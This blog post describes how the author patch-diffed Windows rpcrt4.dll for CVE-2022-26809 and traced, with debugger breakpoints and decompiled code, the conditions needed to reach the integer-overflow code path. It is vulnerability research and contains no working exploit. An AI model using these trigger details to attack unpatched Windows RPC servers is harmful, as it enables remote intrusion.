There are new articles available, click to refresh the page.

CVE-2022-26809 Reaching Vulnerable Point starting from 0 Knowledge on RPC

Lately, along to malware analisys activity I started to study/test Windows to understand something more of its internals. The CVE here analyzed, has been a good opportunity to play with RPC and learn new funny things I never touched before and moreover it looked challenging enough to spent time.

This blogpost shows my roadmap to understand and reproduce the vulnerability, the analisys has the purpose just to arrive to a PoC of the vulnerability not to understand every bit of the RPC implementation neither to write an exploit for it.
RPC, for my basic knowlege, was just a way to call procedure remotely, e.g. client wants to execute a procedure in a server and get the result just like a syscall between user space and server space. This method allows in SW design to decouple goals and purpose and often lead to a good segregation of the permission. Despite this highly level, the RPC represented just another attack vector. The RPC protocol is implemented on top of various medium or transport protocols, e.g. pipes, UDP, TCP.
The vulnerability, as reported by Microsoft is an RCE on Remote Procedure Call. It’s not specified where is the bug, neither how to trigger it, so it is required to obtain the patch and diff it with a vulnerable version of the main library that implements the RPC, i.e. rpcrt4.dll.

Below is shown the exactly things I did to arrive to the vulnerable point, so the blogpost is more about finding a way without having complete knowledge of the analyzed object. Indeed the information I got about the RPC internals are shown here in a logic-time order so they are not represented in a structured way, as is usually done at the end of an analisys.

Search for the vulnerability

Before starting with the usual binary diff, it’s required to get the right windows version in order to get the vulnerble library. I was lucky, my FLARE mount Windows 10 version 21H2 that is vulnerable according to the cpe published by the NIST. Before patching the systems it’s required to download the windows symbols (PDB) just to have the Windows symbols in Ghidra.

Symbols Download

The symbols could be downloaded with the following commands, it’s required to have installed windows kits:

    cd "C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\"
    .\symchk.exe  /s srv*c:\SYMBOLS*https://msdl.microsoft.com/download/symbols C:\Windows\System32\*.dll  


After, downloaded the symbols I opened the library rpcrt4.dll, that is supposed to be vulnerable, in Ghidra then resolved symbols loading the right PDB and exported the Binary for Bindiff.

The hash of my rpcrt4.dll library is: b35fdb8d452e39cdf4393c09530837eff01d33c7

Since my windows version is:

Vulnerable Windows Version


The patch to download, obtained from Microsoft, is the following:

Windows CVE-2022-26809 Patch


After applying the patch the system contains a new rpcrt4.dll having SHA1: d78a9d416a1187da8550fb0d5a4bace48cfa8179

Windows rpcrt4.dll after patch


Bindiff

In order to load into ghidra the patched library has been necessary to download again the symbols and import the new PDB. After this operation, the binaries, i.e. the vulnerable and the patched one, are exported for bindiff and a binary diff is executed on them.

In the following image it’s clear that the patch introduced new functions and some other are not available anymore.
Diffing Main Info

Indeed, only 97% of similarity with ~640 unmatched functions. Since I am not an expert of the RPC internals, I started investigate the differencies starting from the functions that have an high percent of similarity tending to 100%.

Low diff functions


I was lucky, the fix seems to be in the ProcessReceivedPDU() routine, indeed seems that in the new rpcrt4.dll version has been added a function to check the sum between two elements.

Vulnerability


So, seems that an integer overflow was the problem in the library.
Now, it’s required to find the answer to some questions:

  1. Is the fix introduced in other functions?
  2. How the bug could be reached, i.e. what we need to raise it?
  3. How to gain command execution?

The Patch

The fix has been introduced calling a function,i.e. UIntAdd(), to sum two items and check if integer overflow happened. The routine is very basic and it was present already in the vulnerable library but never called.

UIntAdd()


The fix, as can be shown by call reference has been applied to multiple routines but in the vulnerable code the routine is never used.

UIntAdd() call refs.


At this point, due to multiple usage of UIntAdd() introduced I could assume that the bug was an integer overflow but I was not sure about which routine is effectively reachable in a easy way for a newbe like me.

UIntAdd() call refs.


UIntAdd() call refs.


UIntAdd() call refs.


Search the way to reach the vulnerable point

Since my knowledge in RPC internals tending to 0 then for me the most easier approach was to build an RPC Client/Server example and sets some breakpoint on first instruction of the routines that contain the fix:

  1. void OSF_CCONNECTION: OSF_CCALL::ProcessReceivedPDU(OSF_CCALL *this,void *param_1,int param_2) - offset: BaseLibrary + 0x3ac7c
  2. long OSF_CCALL::GetCoalescedBuffer(OSF_CCALL *this,_RPC_MESSAGE *param_1) - offset BaseLibrary + 0xad10c
  3. long OSF_CCALL::ProcessResponse(OSF_CCALL *this,rpcconn_response *param_1,_RPC_MESSAGE *param_2,int *param_3) - offset: BaseLibrary + 0xae3f8
  4. long OSF_SCALL::GetCoalescedBuffer(OSF_SCALL *this,_RPC_MESSAGE *param_1,int param_2) - offset: BaseLibrary + 0xb35fc

The first example I run to check if the vulnerable code is reached in some way is a basic RPC client server with a Windows NT authentication and multiple kind of protocol selectable by arguments, the example used in this phase is visible at: Github

The github link above contains a basic server client RPC with customizable endpoint/protocol selection and basic authentication WINNT just on the connection, RPC_C_AUTHN_LEVEL_CONNECT.

The supported protocols are:

  1. ncacn_np - named pipes are the medium Doc
  2. ncacn_ip_tcp - TCP/IP is the stack on which the RPC messages are sent, indeed the endpoint is a server and port Doc
  3. ncacn_http - IIS is the protocol family, the endpoint is specified with just a port number Doc
  4. ncadg_ip_udp - UDP/IP is the protocol stack on which RPC messages are sent, this is obsolete.
  5. ncalrpc - the protocol is the local interprocess communication, the endpoint is specified with a string at most 53 bytes long Doc

In my initial tests, I run the example, RPCServerTest.exe 1 5000 using the TCP/IP as protocol in order to inspect packets with wireshark. The RPC is based on some transport protocol that can be different and on top there is of course a common protocol used to call remote procedure, i.e. passing parameters serialized and choosing the routine to execute.

So, I run the example via x64dbg and put the breakpoints in the main functions that were patched, using the following script:

$base_rpcrt4 = rpcrt4:base

$addr = $base_rpcrt4 + 0x3ac7c
lblset $addr, "OSF_SCALL::ProcessReceivedPDU_start"
bp $addr
log "Put BP on {addr} "

$addr = $base_rpcrt4 + 0xad10c
lblset $addr, "OSF_CCALL::GetCoalescedBuffer_start"
bp $addr
log "Put BP on {addr} "

$addr = $base_rpcrt4 + 0xae3f8
lblset $addr, "OSF_CCALL::ProcessResponse_start"
bp $addr
log "Put BP on {addr} "

$addr = $base_rpcrt4 + 0xb35fc
lblset $addr, "OSF_SCALL::GetCoalescedBuffer_start"
bp $addr
log "Put BP on {addr} "


Running the client, RPCClientTest.exe 1 5000, the execution stops at OSF_SCALL::ProcessReceivedPDU().

wir1


The only vulnerable function touched with the previous test is: OSF_SCALL::ProcessReceivedPDU() and it is reached when the client ask for executing the hello procedure. Now it’s required to understand what is passed as argument to the function as arguments, just by the name it’s possible to assume that the routine is called to process the Protocol Data Unit received.

OSF_SCALL::ProcessReceivedPDU()

In order to understand how the function is called and so which are the parameters passed it’s required to analize the functions in the stack trace. Below is shown how in the previous test is reached the vulnerable routine.

OSF_SCALL::ProcessReceivedPDU(OSF_SCALL *param_1,OSF_SCALL **param_2,byte *param_3,int param_4)
rpcrt4.dll + 0x3ac14 #  OSF_SCALL::BeginRpcCall(longlong *param_1,OSF_SCALL **param_2,OSF_SCALL **param_3)
rpcrt4.dll + 0x3d2ae #  void OSF_SCONNECTION::ProcessReceiveComplete(longlong *param_1,longlong *param_2,OSF_SCALL **param_3,ulonglong param_4)
rpcrt4.dll + 4c99c   #  void DispatchIOHelper(LOADABLE_TRANSPORT *param_1,int param_2,uint param_3,void *param_4, uint param_5,OSF_SCALL **param_6,void *param_7)
other libraries
...


wir2


The param1 of the OSF_SCALL::ProcessReceivedPDU() should be the class instance that maintain the status of the connection. The param2 of the OSF_SCALL::ProcessReceivedPDU() is just the tcp payload received from the client. The param3 of the OSF_SCALL::ProcessReceivedPDU() could be the tcp len field or the fragment len field, in any case seems that both are each time equals. The param4 of the OSF_SCALL::ProcessReceivedPDU() at first look should be something related the auth method choosen.

Unfortunately, seems that both param2 and param3 are passed directly to DispatchIOHelper() and as shown in the stack trace the dispatchIOHelper() is reached probably in some asynchronous way, maybe a thread wait for a messages from clients and start the dispatcher on every message received.

Before exploring the code I created a .h file containing the DCE RPC data structure in order to have a better view on ghidra.

 typedef struct
{
    char version_major;
    char version_minor;
    char pkt_type;
    char pkt_flags;
    unsigned int data_repres;
    unsigned short fragment_len;
    unsigned short auth_len;
    unsigned int call_id;
    unsigned int alloc_hint;
    unsigned short cxt_id;
    unsigned short opnum;
    char data[256]; // it should be .fragment_len - 24 bytes long
} dce_rpc_t;

Let’s explore the code to understand better what can be done and under which constraints.

The vulnerable code is the following:


In order to reach that part of the code is required to pass some check. It’s required to take this branch, this is taken every time. I don’t care why at the moment.


The following branches should not be taken, so the packet sent should be a REQUEST packet in order to avoid those branches.


It’s required to enter branch at 115 line, this is taken every time, maybe due to authentication.

The branch at line 117 in my tests is never taken.

The branch at line 119 should not be taken otherwise the data sent are overwritten, in order to not enter it’s required that the packet flags is not negative:

    8th bit the highest: Object <-- must be 0
    7th bit            : Maybe
    6th bit            : Did not execute
    5th bit            : Multiplex
    4th bit            : Reserved
    3th bit            : Cancel
    2th bit            : Last fragment
    1th bit            : First fragment

local_res18 is negative only if the highest bit is set, so in order to avoid that branch it’s required to not set Object flag.


It’s required to enter in the branch at line 128 so the packet sent should not be the first fragment and so it should not have the first fragment flag enabled. Since my tests until now have been conducted with this code Github, I decided to implement a client using Impacket library it is found here: Github.


Indeed with the initial test written in C, the al register, BP on base library + 0x3ad0e, containing the packet flags is set to 0x03, i.e. FIRST_FRAG & LAST_FRAG


On the second packet received with the impacket client al register contains 0 because the middle packet is not the first and neither the last of course.


The branch at line 130 is taken anytime, but the one at line 134 is never taken with any client. Not digged inside conditions that I did not need to bypass*

So, it’s required to force the following conditions :

if ((*(int *)(this + 0x244) == 0) || (*(int *)(this + 0x1cc) != 0))


To avoid the branch this+0x244 should be not 0 and this + 0x1cc should be 0. this+0x244 is set to 1 in the function void OSF_SCALL::BeginRpcCall(longlong *param_1,dce_rpc_t *tcp_payl,OSF_SCALL **param_3):baselibrary+0x8e806.


I focused on the *plVar3 + 0x38 value because *this +0x244 is zeroed every time in ActivateCall(), called from BeginRpcCall().


OSF_SCONNECTION::LookupBinding() just walks a list until it finds the second parameter that corresponds to context id passed in the dce rpc packet.

OSF_SBINDING * __thiscall OSF_SCONNECTION::LookupBinding(OSF_SCONNECTION *this,ushort param_1)

{
  OSF_SBINDING *pOVar1;
  SIMPLE_DICT *this_00;
  ulonglong uVar2;
  uint local_res8 [8];
  
  local_res8[0] = 0;
  this_00 = (SIMPLE_DICT *)(this + 0x80);
  uVar2 = (ulonglong)param_1;
  do {
    pOVar1 = (OSF_SBINDING *)SIMPLE_DICT::Next(this_00,local_res8);
    if (pOVar1 == (OSF_SBINDING *)0x0) {
      return (OSF_SBINDING *)0x0;
    }
  } while (*(int *)(pOVar1 + 8) != (int)uVar2);
  return pOVar1;
}


So it gets every item from the list, stored at OSF_CONNECTION instance + 0x80.

void * __thiscall SIMPLE_DICT::Next(SIMPLE_DICT *this,uint *param_1)

{
  void *pvVar1;
  uint uVar2;
  ulonglong uVar3;
  
  uVar2 = *param_1;
  if (uVar2 < *(uint *)(this + 8)) {
    do {
      uVar3 = (ulonglong)uVar2;
      uVar2 = uVar2 + 1;
      pvVar1 = *(void **)(*(longlong *)this + uVar3 * 8);
      *param_1 = uVar2;
      if (pvVar1 != (void *)0x0) {
        return pvVar1;
      }
    } while (uVar2 < *(uint *)(this + 8));
  }
  *param_1 = 0;
  return (void *)0x0;
}


The routine that walks the dictionary shows the dictionary implementation, basically it contains the item number at dictionary+0x8 and every item is long just 8 bytes,indeed it is a memory address. The second parameter passed to the Next() routine is just an memory address pointing to a value used to check if the right item is found during the walk. So at the end the vulnerable code is reached if and only if the address returned from the lookup, i.e. *plVar3 + 0x38 has second bit set

BeginRpcCall()
....
      plVar3 = (longlong *)
               OSF_SCONNECTION::LookupBinding((OSF_SCONNECTION *)param_1[0x26],tcp_payl->cxt_id); // get the item
      param_1[0x27] = (longlong)plVar3;
      if (plVar3 != (longlong *)0x0) {
        if ((*(byte *)(*plVar3 + 0x38) & 2) != 0) {
                    /* enter here in order to make param1 + 0x244 != 0 */
          *(undefined4 *)((longlong)param_1 + 0x244) = 1;
....


The structures links starting from the connection instance structure to the structure containing the flag checked that could lead us to set instance(OSF_SCONNECTION) + 0x244 to 1 is shown below.

typedef struct
{
  ...
  offset 0x130: dictionary_t *dictionary;
  ...
  offset 0x244: uint32_t flag; // must be 1 to enter in vulnerable code block in ProcessReceivedPDU() 
  ... 
} OSF_SCONNECTION_t

typedef struct
{
  ...
  offset 0x80: items_list_t *itemslist;
  ...
}dictionary_t;

typedef struct
{
  offset 0x0: item_t * items[items_no]
  offset 0x8: uint32_t items_no;
  ...
}items_list_t

typedef struct
{
  offset 0x0: flags_check_t *flags;
  ...
}item_t

typedef struct
{
  ...
  offset 0x38: uint32_t flag_checked 
  ...
}


At this point it’s important to understand where it creates the dictionary value and where the value is set. I found that the dictionary address changes every connect. So it should be created on the client connection.

To find where the dictionary is assigned to this[0x26], i.e. in the OSF_SCONNECTION instance, I placed a breakpoint on write on the memory address used to store the dictionary address, i.e. this[0x26].

This unveils where the dictionary is inserted into the instance object.


Seems that it is created at: rpcrt4.dll+0x3668f:OSF_SCALL::OSF_SCALL()


Below the stack trace:

rpcrt4.dll+0x3668f:OSF_SCALL::OSF_SCALL()
rpcrt4.dll+0x3620a:OSF_SCONNECTION::OSF_SCONNECTION()
rpcrt4.dll+0xd8e55:WS_NewConnection(CO_ADDRESS *param_1,BASE_CONNECTION **param_2)
rpcrt4.dll+0x4e266:CO_AddressThreadPoolCallback()


Since, LookupBinding(dictionary, item), searches the item starting from the param1+0x80 and since there is just one client that is connecting.


Below is shown in the debugger the link that starts from the connection instance to the flag contained in the item returned from lookup.


The dictionary is filled with an item already instantiated, i.e. with flag already set, in the OSF_SCONNECTION::ProcessPContextList() routine. Basically, this routine is reached from with the following stack:

rpcrt4.dll + 0x3e4f5: SIMPLE_DICT::Insert() 
rpcrt4.dll + 0x39473: OSF_SCONNECTION::ProcessPContextList()
rpcrt4.dll + 0x38b31: OSF_SCONNECTION::AssociationRequested()
rpcrt4.dll + 0x3d3b6: OSF_SCONNECTION::processReceiveComplete()

OSF_SCONNECTION::processReceiveComplete() is called every time arrive a packet from the client. The S in front of the namespace means that the routine is used by the RPC servers.


This routine, OSF_SCONNECTION::ProcessPContextList(), store the context id in a new dictionary item, from this routine could be found the exact structure of the dictionary items at instance(OSF_SCONNECTION)[0x26]. Unfortunately the item, i.e. the structure that contains the flag to force is not initialized on every connection.

Indeed I added a break point on the flag memory address to track the instructions overwriting it. I would expect some free/alloc on every connection just like the dictionary, but this never happened. This led me to think that it should be created during RPC Server initialization.

The item address, i.e. the object that contains the flag to force, is retrieved and set in the dictionary at:

0x57b54 RPC_SERVER::FindInterfaceTransfer()

                           
offset: 0x57a6c | mov rsi,qword ptr ds:[GlobalRpcServer]          ; RSI will contain the address of GlobalRPCServer
offset: 0x57aae | mov rdx,qword ptr ds:[rsi+120]                  ; most likely address of items                
offset: 0x57ab9 | mov rdi,qword ptr ds:[rdx+rax*8]                ; get the ith item       
offset: 0x57b30 | call RPC_INTERFACE::SelectTransferSyntax        ; check if the connection match with the interface                         
offset: 0x57b35 | test eax,eax                                    ; if eax == 0 return, interface/item found! 
offset: 0x57b54 | mov qword ptr ds:[rax],rdi                      ; Address of the item with the flag to force is returned writing it in *rax 

Basically, RPC_SERVER::FindInterfaceTransfer() is called by ProcessPContextList() and it is executed most likely to find the RPC interface according to the information sent by the client for example, uuid value.

Below the debugger view on 0x57b54.


Since GlobalRpcServer is fixed address, and it contains the address of the struct that contain the items, I just looked at the write reference on ghidra and found where GlobalRpcServer is filled with the struct address.

wchar_t ** InitializeRpcServer(undefined8 param_1,uchar **param_2,SIZE_T param_3)
{
  ppwVar24 = (wchar_t **)0x0;
  local_res8[0]._0_4_ = 0;
  ppwVar19 = ppwVar24;
  if (GlobalRpcServer == (RPC_SERVER *)0x0) {
    this = (RPC_SERVER *)AllocWrapper(0x1f0,param_2,param_3);
    ppwVar5 = ppwVar24;
    if (this != (RPC_SERVER *)0x0) {
      param_2 = local_res8;
      ppwVar5 = (wchar_t **)RPC_SERVER::RPC_SERVER(this,(long *)param_2);
      ppwVar19 = (wchar_t **)(ulonglong)(uint)local_res8[0];
    }
    if (ppwVar5 == (wchar_t **)0x0) {
      GlobalRpcServer = (RPC_SERVER *)ppwVar5; 
      return (wchar_t **)0xe;
    }
    GlobalRpcServer = (RPC_SERVER *)ppwVar5; // OFFSET: 0xb3d2; here the global rpc server is set to a new fresh memory.
    ...
  }
  ...
}


The routine InitializeRpcServer() is called from a RpcServerUseProtseqEpW() that is directly called by the RPC server! As shown in the debugger view, *GlobalRpcServer + 0x120 is already filled but *(*GlobalRpcServer + 0x120) is equal to NULL.


Setting a breakpoint on memory write of: *(*GlobalRpcServer + 0x120) , I found where the address of the item is set! Below is shown the stack trace:

rpcrt4.dll + 0x3e4f9 at SIMPLE_DICT::Insert() 
rpcrt4.dll + 0xd498  at RPC_INTERFACE * RPC_SERVER::FindOrCreateInterfaceInternal()
rpcrt4.dll + 0xd196  at void RPC_SERVER::RegisterInterface() 
rpcrt4.dll + 0x7271e at void RpcServerRegisterIf()
server rpc function 


From the memory contents shown below:


The *item + 0x38 appears to be NULL, let’s set a breakpoint to that memory address. To resume up, the flag to force is reachable from:

typedef struct
{
  rpc_interfaces_t **addresses;
}GlobalRpcServer_t;

typedef struct
{
  ...
  offset 0x120:  item_t **items
  ...
}rpc_interfaces_t;

typedef struct
{
  ...
  offset 0x38:  uint32_t flag_checked // Flag check in BeginRpcCall()
  ...
}item_t

It was clear that our flag to force has not already set so I set up another write breakpoint on *item + 0x38 to find where it is set! So, I found the point where the flag is modified, as visibile in the debugger.


The code that modifies the flag is reached from this stack trace.

rpcrt4.dll + 0xd30e : RPC_INTERFACE::RegisterTypeManager() 
rpcrt4.dll + 0xd1bf : void RPC_SERVER::RegisterInterface() 
rpcrt4.dll + 0x7271e: void RpcServerRegisterIf() 
RPC server functions


void RpcServerRegisterIf(uint *param_1,uint *uuid,SIZE_T param_3)

{
  ...
    RPC_SERVER::RegisterInterface
              (GlobalRpcServer,param_1,uuid,param_3,0,0x4d2,gMaxRpcSize,(FuncDef2 *)0x0,
               (ushort **)0x0,(RPCP_INTERFACE_GROUP *)0x0);

  ...
}

void RPC_SERVER::RegisterInterface
               (RPC_SERVER *param_1,uint *param_2,uint *param_3,SIZE_T param_4,uint param_5,
               uint param_6,uint param_7,FuncDef2 *param_8,ushort **param_9,
               RPCP_INTERFACE_GROUP *param_10)

{
  if (param_3 != (uint *)0x0) {
    local_80 = param_3;
  }
  local_58 = ZEXT816(0);
  local_78 = param_2;
  local_60 = param_3;
  ...
  puVar6 = RPC_INTERFACE::RegisterTypeManager(pRVar5,local_60,param_4);
  ...
}

RPC_INTERFACE::RegisterTypeManager(RPC_INTERFACE *param_1,undefined4 *param_2,SIZE_T param_3)
{
  ...
  if ((param_2 == (undefined4 *)0x0) ||
     (iVar6 = RPC_UUID::IsNullUuid((RPC_UUID *)param_2), iVar6 != 0)) {
    if ((*(uint *)(param_1 + 0x38) & 1) == 0) {
      *(int *)(param_1 + 200) = *(int *)(param_1 + 200) + 1;
      *(uint *)(param_1 + 0x38) = *(uint *)(param_1 + 0x38) | 1; // SET to 1 the flag!
      *(SIZE_T *)(param_1 + 0x40) = param_3;
      RtlLeaveCriticalSection(pRVar1);
      return (undefined4 *)0x0;
    }
    puVar11 = (undefined4 *)0x6b0;
  }
  ...
}

Looking at the stack trace and the code, it’s clear that the RPC server implementation called with RpcServerRegisterIf() without specifying any MgrTypeUuid. At this point it was most likely that I could, from client side, alter in some way that flag that trigger the vulnerable code.

Anyway, backing to the BeginRpcCall(), in order to execute vulnerable code it’s required that the item_t flag value has the second bit set. Since that value is never written, I could not use the debugger anymore to find where the second bit’s flag is set. So, I searched for instruction patterns basing on the information I got:

  1. The value is bitmask flag, this was clear because the values are checked with TEST instruction and because the value, i.e. 1 has been set with an or operator.
  2. The item_t is a kind of structure, most likely the access to the flag member more or less the same, i.e. [register + 0x38]
  3. Flag is 4 byte long

According to these information I searched for instruction like: or dword ptr [anyregs+0x38], 2


RPC_INTERFACE::RPC_INTERFACE
          (RPC_INTERFACE *this,_RPC_SERVER_INTERFACE *param_1,RPC_SERVER *param_2,uint param_3,
          uint param_4,uint param_5,FuncDef2 *param_6,void *param_7,long *param_8,
          RPCP_INTERFACE_GROUP *param_9)

{
  RPC_INTERFACE *pRVar1;
  int iVar2;
  int iVar3;
  
  *(undefined4 *)(this + 8) = 0;
  RtlInitializeCriticalSectionAndSpinCount(this + 0x10,0);
  *(undefined4 *)(this + 0x38) = 0;
  *(undefined4 *)(this + 200) = 0;
  pRVar1 = this + 0x170;
  *(undefined (**) [16])(this + 0xd8) = (undefined (*) [16])(this + 0xe8);
  *(undefined8 *)(this + 0xe0) = 4;
  *(undefined (*) [16])(this + 0xe8) = ZEXT816(0);
  *(undefined (*) [16])(this + 0xf8) = ZEXT816(0);
  *(undefined4 *)(this + 0x14c) = 0;
  *(undefined4 *)(this + 0x150) = 0;
  *(undefined4 *)(this + 0x154) = 0;
  *(undefined4 *)(this + 0x158) = 0;
  *(undefined4 *)(this + 0x15c) = 0;
  *(undefined4 *)(this + 0x160) = 0;
  *(undefined4 *)(this + 0x164) = 0;
  *(undefined4 *)(this + 0x168) = 0;
  *(undefined4 *)(this + 0x16c) = 0;
  RtlInitializeSRWLock(this + 0x1e0);
  *(RPC_INTERFACE **)(this + 0x178) = pRVar1;
  *(RPC_INTERFACE **)pRVar1 = pRVar1;
  *(undefined4 *)(this + 0x180) = 0;
  *(undefined4 *)(this + 0x1e8) = 0;
  *(undefined (**) [16])(this + 0x1f0) = (undefined (*) [16])(this + 0x200);
  *(undefined8 *)(this + 0x1f8) = 4;
  *(undefined (*) [16])(this + 0x200) = ZEXT816(0);
  *(undefined (*) [16])(this + 0x210) = ZEXT816(0);
  *(undefined4 *)(this + 0x220) = 0;
  *(undefined8 *)(this + 0x228) = 0;
  *(RPC_SERVER **)this = param_2;
  *(undefined8 *)(this + 0xd0) = 0;
  *(undefined8 *)(this + 0xb8) = 0;
  *(undefined8 *)(this + 0x230) = 0;
  *(undefined8 *)(this + 0x238) = 0;
  iVar3 = UpdateRpcInterfaceInformation
                    ((longlong)this,(uint *)param_1,(ushort **)(ulonglong)param_3,param_4,param_5,
                     (longlong)param_6,(ushort **)param_7,(longlong)param_9);
  iVar2 = *(int *)param_1;
  *param_8 = iVar3;
  if ((iVar2 == 0x60) && (((byte)param_1[0x58] & 1) != 0)) {
    *(uint *)(this + 0x38) = *(uint *)(this + 0x38) | 2;
  }
  return this;
}

Seems that the or is executed under some conditions. At this point, it was required to verify this assumption, I set up a breakpoint on those conditions: offset: 0xd87c


rpcrt4.dll + 0xd87c at RPC_INTERFACE::RPC_INTERFACE()
rpcrt4.dll + 0xb82e at InitializeRpcServer()
rpcrt4.dll + x      at PerformRpcInitialization()
rpcrt4.dll + y      at RpcServerUseProtseqEpW()


wchar_t ** InitializeRpcServer(undefined8 param_1,uchar **param_2,SIZE_T param_3)
{
    ...
      this_01 = (RPC_INTERFACE *)
                RPC_INTERFACE::RPC_INTERFACE
                          (this_00,(_RPC_SERVER_INTERFACE *)&DAT_1800e7470,GlobalRpcServer,1,0x4d2,
                           0x1000,(FuncDef2 *)0x0,(void *)0x0,(long *)local_res8,
                           (RPCP_INTERFACE_GROUP *)0x0);
    ...
}

The parameter on which the condition is check is fixed, i.e. DAT_1800e7470, and never altered.


But, going on with the debugger, I break on the same point. This time with another stack trace that starts exactly in my rpc server test!


rpcrt4.dll + 0xd87c  at RPC_INTERFACE::RPC_INTERFACE()
rpcrt4.dll + 0xd475  at RPC_INTERFACE * RPC_SERVER::FindOrCreateInterfaceInternal()
rpcrt4.dll + 0xd196  at void RPC_SERVER::RegisterInterface()
rpcrt4.dll + 0x7271e at void RpcServerRegisterIf()
RPCServerTest.exe: main

RPC_INTERFACE *
RPC_SERVER::FindOrCreateInterfaceInternal
          (RPC_SERVER *param_1,_RPC_SERVER_INTERFACE *param_2,ulonglong param_3,uint param_4,
          uint param_5,FuncDef2 *param_6,void *param_7,long *param_8,int *param_9,
          RPCP_INTERFACE_GROUP *param_10)

{
...
  pRVar5 = (RPC_INTERFACE *)AllocWrapper(0x240,p_Var8,uVar10);
  uVar2 = (uint)p_Var8;
  this = pRVar9;
  if (pRVar5 != (RPC_INTERFACE *)0x0) {
    p_Var8 = param_2;
    this = (RPC_INTERFACE *)
           RPC_INTERFACE::RPC_INTERFACE
                     (pRVar5,param_2,param_1,(uint)param_3,param_4,param_5,param_6,param_7,param_8,
                      param_10);
    uVar2 = (uint)p_Var8;
  }
...
}


void RPC_SERVER::RegisterInterface
               (RPC_SERVER *param_1,uint *param_2,uint *param_3,SIZE_T param_4,uint param_5,
               uint param_6,uint param_7,FuncDef2 *param_8,ushort **param_9,
               RPCP_INTERFACE_GROUP *param_10)

{
  ...
  RtlEnterCriticalSection(param_1);
  pRVar5 = FindOrCreateInterfaceInternal
                       (param_1,(_RPC_SERVER_INTERFACE *)param_2,(ulonglong)param_5,param_6,local_84
                        ,param_8,param_9,(long *)&local_80,(int *)&local_78,local_68);
  ...
}


void RpcServerRegisterIf(uint *param_1,uint *uuid,SIZE_T param_3)
{
  MUTEX *pMVar1;
  void *in_R9;
  undefined4 in_stack_ffffffffffffffc8;
  undefined4 in_stack_ffffffffffffffcc;
  
                    /* 0x726c0  1483  RpcServerRegisterIf */
  if ((RpcHasBeenInitialized != 0) ||
     (pMVar1 = PerformRpcInitialization
                         ((int)param_1,uuid,(int)param_3,in_R9,
                          (void *)CONCAT44(in_stack_ffffffffffffffcc,in_stack_ffffffffffffffc8)),
     (int)pMVar1 == 0)) {
    RPC_SERVER::RegisterInterface
              (GlobalRpcServer,param_1,uuid,param_3,0,0x4d2,gMaxRpcSize,(FuncDef2 *)0x0,
               (ushort **)0x0,(RPCP_INTERFACE_GROUP *)0x0);
  }
  return;
}

Basically, that conditions failed because of the first parameter passed by my rpc server test application to RpcServerRegisterIf().

At this point I looked at my code to find which kind of configuration I used and how I could change it in My test server app.

API prototype > 
  RPC_STATUS RpcServerRegisterIf(
    RPC_IF_HANDLE IfSpec,
    UUID          *MgrTypeUuid,
    RPC_MGR_EPV   *MgrEpv
  );

My RpcServerRegisterIf call > 
   status = RpcServerRegisterIf(interfaces_v1_0_s_ifspec,
        NULL,
        NULL);

Value of interfaces_v1_0_s_ifspec >
  static const RPC_SERVER_INTERFACE interfaces___RpcServerInterface =
    {
    sizeof(RPC_SERVER_INTERFACE),
    ,{1,0}},
    ,{2,0}},
    (RPC_DISPATCH_TABLE*)&interfaces_v1_0_DispatchTable,
    0, 
    0,
    0,
    &interfaces_ServerInfo,
    0x04000000 // param_1[0x58]
    };

Of course, the value of interfaces_v1_0_s_ifspec is equal to the one shown in the last debugger image! Since, the failing check is done on param_1[0x58] & 1, I changed 0x04000000 to 0x04000001 in order to have the vulnerable code executing!


Pay attention that this is not triggered by the client, in the previous screen the server just configure itself, no client connected to it. Finally in the BeginRpcCall() the check is satisfied.


Finally, the check inside the ProcessReceivedPDU() is satisfied, but the vulnerable code still not reached because of:

ulonglong OSF_SCALL::ProcessReceivedPDU (OSF_SCALL *this,dce_rpc_t *tcp_payload,uint len,int auth_fixed?)
{
    ...
          if ((*(int *)(this + 0x244) == 0) || (*(int *)(this + 0x1cc) != 0)) { // not enter here!
            ...
          }
    ...
          else if (pkt_tyoe == 0) { // packet is a request
                    /* should not enter here  */
            if (*(int *)(this + 0x214) == 0) {
            ...
            goto _OSF_SCALL::DispatchRPCCall // that handle the request
            }
            //vulnerable code
          }
          
  ...
}

The problem now is to find under which conditions (this + 0x214) is set. I already saw that in the ActivateCall() routine called every time an RPC communication starts *(this + 0x214) is set to 0. For this, for sure on first call that value cannot be different by 0.

I decided to dig a bit in the code just to understand better how the messages are handled. The messages are processed according to the packet type defined in the DCERPC field,Reference, in the routine void OSF_SCONNECTION::ProcessReceiveComplete().

void OSF_SCONNECTION::ProcessReceiveComplete{

  if (pkt_type == 0) { // packet is a request
    if (*(int *)(this + 3) == 0) { // not investigated
        uVar6 = tcp_received->call_id;
        if (*(int *)((longlong)this + 0x17c) < (int)uVar6) { //should enter here if the call id is new, i.e. the packet refer to a new request
          ...
          ppvVar9 = (LPVOID *)OSF_SCALL::OSF_SCALL(puVar11,(longlong)this,(long *)pdVar18); // maybe instantiate the object to represent the call request
          ...
          iVar4 = OSF_SCALL::BeginRpcCall((longlong *)ppvVar9,tcp_received,ppOVar20);
          ...
        }
        else{
          ppvVar9 = (LPVOID *)FindCall((OSF_SCONNECTION *)this,uVar6); // the call id has already view in the communication there should be an object, FIND IT!
          if (ppvVar9 == (LPVOID *)0x0) { // not found this is a new call id request, should have first fragment set and not reuse already used call ids?
            uVar6 = tcp_received->call_id;
            if (((int)uVar6 < *(int *)((longlong)this + 0x17c)) ||
               ((tcp_received->pkt_flags & 1U) == 0)) { // should not be 
              uVar6 = *(int *)((longlong)this + 0x17c) - uVar6;
              goto reach_fault?;
            }
            goto LAB_18009016d;
          }
call_processReceivedPDU: // call id object found just process new message
          uVar8 = OSF_SCALL::ProcessReceivedPDU((OSF_SCALL *)ppvVar9,tcp_received,uVar13,0);
          ...
        }
    }
    else
    {
        uVar6 = tcp_received->call_id;
        if ((*(byte *)&tcp_received->data_repres & 0xf0) != 0x10) {
          uVar6 = uVar6 >> 0x18 | (uVar6 & 0xff0000) >> 8 | (uVar6 & 0xff00) << 8 | uVar6 << 0x18;
        }
        if ((tcp_received->pkt_flags & 1U) == 0) {
          if (*(int *)((longlong)this + 0x1c) != 0) {
            uVar6 = *(int *)((longlong)this + 0x17c) - uVar6;
reach_fault?:
            if (0x95 < uVar6) goto goto_SendFAULT;
            goto LAB_180090122;
          }
        }
        else if (*(int *)((longlong)this + 0x1c) != 0) { // this+0x1c could be a flag true or false that says if the call id is new or not
          REFERENCED_OBJECT::AddReference((longlong)this,plVar15,pdVar18);
          *(undefined4 *)((longlong)this + 0x1c) = 0;
          *(uint *)((longlong)this + 0x17c) = uVar6;
